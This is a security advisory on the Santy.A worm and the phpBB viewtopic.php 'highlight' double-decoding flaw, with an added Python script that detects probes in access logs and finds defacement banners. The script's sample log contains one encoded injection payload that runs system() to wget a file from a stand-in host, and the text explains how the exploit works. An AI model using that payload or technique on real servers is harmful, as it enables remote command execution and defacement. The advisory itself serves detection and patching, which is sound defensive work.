DragonSoft
www.dragonsoft.com

Santy.A WebWorm attack vulnerability of phpBB
phpBB is a free, open-source web bulletin board package. phpBB v2.0 through v2.0.10 are vulnerable to an input validation flaw.

viewtopic.php fails to handle urldecode() of the "highlight" parameter safely: the script decodes the value a second time after the web server has already decoded it, so double-encoded characters bypass the script's sanitization and reach a string that PHP evaluates. A remote attacker can exploit this to execute arbitrary commands with the privileges of the web server and deface the phpBB website.

Santy.A is a worm that spreads between web servers running phpBB 2.x prior to 2.0.11. It submits search queries to the Google search engine to find servers running phpBB, then attacks each one through the vulnerability above and installs a copy of itself on the compromised server. If successful, the worm overwrites files with the following extensions: .asp, .htm, .jsp, .php, .phtm, .shtm, replacing their contents with this message:

This site is defaced!!!
NeverEverNoSanity WebWorm generation (number of infection)
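The following Python script is an added example, not DragonSoft's or phpBB's code. It shows two checks an administrator reading this advisory would want: scanning Apache combined-format access logs for requests to viewtopic.php whose "highlight" parameter, after the extra percent-decoding the vulnerable script performs, contains a single quote (the character the exploit needs to break out of the string PHP evaluates), and scanning web content for the worm's defacement banner. The log lines, addresses and payload are constructed for illustration; the log format, the numeric "generation" counter and the helper names are assumptions of this example, not details taken from the advisory.

```python
"""Detection helpers for Santy.A-style probes against phpBB viewtopic.php (added example)."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-log lines for illustration (not real traffic; the
# addresses are documentation ranges and the payload is a harmless stand-in).
SAMPLE_LOG = """\
203.0.113.5 - - [21/Dec/2004:10:12:01 +0800] "GET /forum/viewtopic.php?t=12&highlight=%2527%252esystem(%2527wget%2520http://198.51.100.7/x.pl%2527)%252e%2527 HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
198.51.100.22 - - [21/Dec/2004:10:12:05 +0800] "GET /forum/viewtopic.php?t=12&highlight=install HTTP/1.1" 200 4711 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Dec/2004:10:13:30 +0800] "GET /forum/viewtopic.php?t=45&highlight=%2527 HTTP/1.0" 200 5000 "-" "-"
"""

# Constructed example of a page body after the worm has overwritten it.
SAMPLE_DEFACED_PAGE = "This site is defaced!!!\nNeverEverNoSanity WebWorm generation 7.\n"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"'
)
# Assumed banner layout: the advisory's text followed by a numeric generation counter.
DEFACE_RE = re.compile(r"NeverEverNoSanity WebWorm generation\s*(\d+)")


def double_decoded_highlight(uri):
    """Return (once, twice): the highlight value as the web server hands it to PHP
    (one percent-decode) and after the script's extra urldecode() (second decode).
    Returns None when the request is not for viewtopic.php or has no highlight."""
    parts = urlsplit(uri)
    if parts.path.rsplit("/", 1)[-1] != "viewtopic.php":
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("highlight")
    if not values:
        return None
    once = values[0]        # parse_qs already removed one layer of %-encoding
    twice = unquote(once)   # the second layer the vulnerable script decodes
    return once, twice


def is_santy_probe(uri):
    """True when the twice-decoded highlight contains a single quote: the character
    that ends the string literal in the evaluated replacement and lets
    attacker-supplied PHP follow it."""
    decoded = double_decoded_highlight(uri)
    if decoded is None:
        return False
    _once, twice = decoded
    return "'" in twice


def scan_log(log_text):
    """Return a list with one dict per suspicious request in Apache combined-log text."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_santy_probe(m.group("uri")):
            continue
        once, twice = double_decoded_highlight(m.group("uri"))
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "decoded": twice,
            # True when the quote was hidden behind a second layer of %-encoding,
            # i.e. it only appears after the script's extra urldecode()
            "double_encoded": once != twice,
        })
    return hits


def defacement_generation(page_text):
    """Return the worm generation counter from a defaced page body, or None."""
    m = DEFACE_RE.search(page_text)
    return int(m.group(1)) if m else None


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['time']} double_encoded={hit['double_encoded']} "
              f"highlight={hit['decoded']!r}")
    print("defaced generation:", defacement_generation(SAMPLE_DEFACED_PAGE))
```

A once-encoded quote (%27) in "highlight" can be an ordinary search term such as "don't", so treat hits with double_encoded set to True, or a decoded value containing a PHP function call, as the strong signal; a clean log does not prove the server was never hit, since the worm's request may have been served by a proxy or logged elsewhere.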


DragonSoft Security Team urges phpBB users to upgrade to phpBB v2.0.11 to prevent exploitation. Administrators should also check web content for the defacement message above, since an already-infected server remains defaced and a source of further infections after the upgrade.

Related Links: Exploit: Vulnerability Assessment:

About DragonSoft Security Associates, Inc.
DragonSoft Security Associates is a leading developer of network security software in Taiwan and an active contributor to network security education. Founded in 2002, DragonSoft offers vulnerability management solutions, including vulnerability assessment, system security management and intrusion prevention.

Tel. +886-3-5630989 Fax. +886-3-5797758
6F, No. 30, Lane 607, Sec. 1, Guangfu Rd., Hsinchu, Taiwan 300. R.O.C
Copyright © DragonSoft Security Associates, Inc. All Rights Reserved